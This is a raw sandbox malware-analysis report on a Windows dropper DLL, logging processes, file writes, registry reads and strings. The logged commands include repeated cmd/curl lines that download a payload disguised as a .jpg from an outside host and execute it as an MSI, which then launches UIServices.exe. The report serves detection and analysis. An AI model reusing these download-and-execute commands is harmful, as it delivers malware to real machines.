Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIC14D.tmp

Jump to behavior

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\3bbba0.msi

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	Code function: 39_2_00007FFC235672A8		39_2_00007FFC235672A8
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	Code function: 47_2_00007FFC23C672A8		47_2_00007FFC23C672A8

Tries to load missing DLLs

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\curl.exe

File created: C:\Users\user\AppData\Local\Temp\spclwow78x.msi

Jump to behavior

Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary string: Failed to open \Device\Afd\Mio: HSF@
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary string: \Device\Afd\Mio

Source: classification engine

Classification label: mal52.troj.evad.winDLL@83/61@3/2

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:68:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.ini

Jump to behavior

Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr

PE file contains sections with non-standard names

Source: 30833088ae6bfb4abc107567083083c9.tmp.37.dr	Static PE information: section name: _RDATA
Source: 29b46379382ed74d83879371e86987c8.tmp.45.dr	Static PE information: section name: _RDATA
Source: fcfd202f570ae346b7d75b811246e386.tmp.53.dr	Static PE information: section name: _RDATA

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI931A.tmp	Jump to dropped file
